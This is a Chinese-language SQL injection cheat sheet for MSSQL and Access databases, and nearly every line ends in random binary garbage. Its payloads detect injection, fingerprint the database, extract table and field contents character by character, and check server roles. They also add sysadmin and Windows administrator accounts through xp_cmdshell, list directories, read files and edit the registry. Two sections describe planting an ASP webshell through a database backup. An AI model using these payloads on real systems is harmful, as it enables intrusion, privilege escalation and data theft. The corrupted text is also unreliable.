1.判断是否有注入;and 1=1 ;and 1=2 U"G�+su->e
2.初步判断是否是mssql ;and user>0 B�P���s
&�
J)&���+y;.
3.注入参数是字符'and [查询条件] and ''=' ,>%r|�YSJ)
*i�N]#)3>�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' t/B�iZo|zl
I:7,�CV���
5.判断数据库系统 ��-~aEqj#?
6Z}))�*3 9
;and (select count(*) from sysobjects)>0 mssql ~PvzU�T-�^
`d;izQ1_=�
;and (select count(*) from msysobjects)>0 access .B��n2;�nO
EqU[mqe��F
$1
\!O�e[i
.F|��WQ7Mu
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8L�KZ3Y�|�
lL�f01sa4�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @Oay$g�P{T
�C&"2`�ll
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ~ ?_Z�!�eS
t$5]1dY$X�
9.(1)猜字段的ascii值(access) U,(+�rMeY0
�Z'kYf����
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 bW3o%�srxa
iR�=�a�YT~
(2)猜字段的ascii值(mssql) �~ZC=!|�Q#
/��T(���~T
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �k�&;��L(D
�6>A8�#VT�
10.测试权限结构(mssql) }
~b�OP^'
�a��r}7�59
(�3�*H�l��
>k-po�B�w
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- iB_j*mX�]�
A|���-\C$�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- e�5]0<�s�$
7FFYSv,[�:
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- }7v2GfE�kM
a��E$p;�I�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- a�5&�j=3)|
��5ZxB�m�Q
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- )g�F9D1e�A
�9R3=�h�5Y
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- u^p[z�epW\
03;(�v���%
;and 1=(select IS_MEMBER('db_owner'));-- /L�zNr0>�2
b�)@x�@3"O
�#p�Fyb�k�
M 4?3���l�
11.添加mssql和系统的帐户 V>�S��A�3
tB��7aH�Z|
;exec master.dbo.sp_addlogin username;-- &6EfybAt^_
;exec master.dbo.sp_password null,username,password;-- �B�r??�Gdd
�SQ�k!�o{
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ]x\w��P7�x
d(XWt;K��K
;exec master.dbo.xp_cmdshell 'net user username password 96j2D8=��w
VG^-�aR_F�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- wH��<�*���
1vb0G�;a;|
;exec master.dbo.xp_cmdshell 'net user username password /add';-- >�o7k%T|l$
3!x)LUWfWY
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �)9�->]U�@
&YMj\KmlSg
uu�B\~ #?T
\�I]'6N�=�
12.(1)遍历目录 m�qw.v�$>�
�W�I3!?�>d
;create table dirs(paths varchar(100), id int) Bnv%�W4���
q�<7�n5kJ~
;insert dirs exec master.dbo.xp_dirtree 'c:\' 2{N0.�� |5
0qd`Pf����
;and (select top 1 paths from dirs)>0 �`^[ra%��a
kA��0��^�~
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) L��f9h;z>#
^g\%�VIOD�
f*Bc`+�G�
yvvR�%]!.�
(2)遍历目录 ER+[gT1�CQ
bE��"CS�K#
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- uzD{ewR/.y
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Mt`.�|N;y!
[u:_J�q�f-
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 S]m[$)U%�@
~Ua�0pS?��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �gy.;
�"W�
7J�k.�U=vY
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 {�`> x"Y�5
x1h!_^(QfF
=Jk�Sq J)?
�T /uu='3�
13.mssql中的存储过程 i%2K%5{)$D
�:�08UeEy�
xp_regenumvalues 注册表根键, 子键 Iq�*�7F5B�
W�0�k_"u�I
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 2~ �a�4i�b
ly2R8$Y`y`
xp_regread 根键,子键,键值名 7=9jXNk �Y
]g �:ZokU
;exec xp_regread uw�JkqlUOz
��s~�CA
@
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 3L|k3 `I�4
*h1@�eJHMz
xp_regwrite 根键,子键, 值名, 值类型, 值 E
J1�:N*BA
*KA��uyJr�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 rxA<\�h,�A
�P^�Uc�pU,
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �uJizR
F�
n�YY� U���
xp_regdeletevalue 根键,子键,值名 6�82�2�xk
t����p"�\
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 e�_SlM=_�u
hS
� Sq=(S
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ,i�c�}
���
.1;?#t]ZV
)�I@iW�\`7
`�XQ5�>�c
14.mssql的backup创建webshell Sl1N� ��V�
Lfor�0-�j�
use model c��QjJ9o7�
23�PSv8;EM
create table cmd(str image); �{#MViBhd%
�x�U��YSD�
insert into cmd(str) values (''); (�@zn[�Nq�
T�ocqoYX{{
backup database model to disk='c:\l.asp'; k6XO�-�a f
X'Oo� ogu
!j�m�
a --
G>�b1No3%k
15.mssql内置函数 �8}&c�E#@�
h!.(7q�dd
;and (select @@version)>0 获得Windows的版本号 {�|cA[#�j#
�`?:'_K�i�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��0)�Z7�U$
��o?>)CAo�
;and (select user_name())>0 爆当前系统的连接用户 �N{'�k
�]&
4d���O�>L"
;and (select db_name())>0 得到当前连接的数据库 u4���Sa4o
T!n�<ya�!
v��'uQ'CiH
IK�t�9=T�x
16.简洁的webshell _�Uq'�eZol
=~)n,5���
use model 2
U�g��j�H
F~��:5/-zs
create table cmd(str image); b�$�BUo8O}
�z9g�Z/d �
insert into cmd(str) values (''); ���*\�>�&�
+{s��^"M2`
backup database model to disk='g:\wwwtest\l.asp';
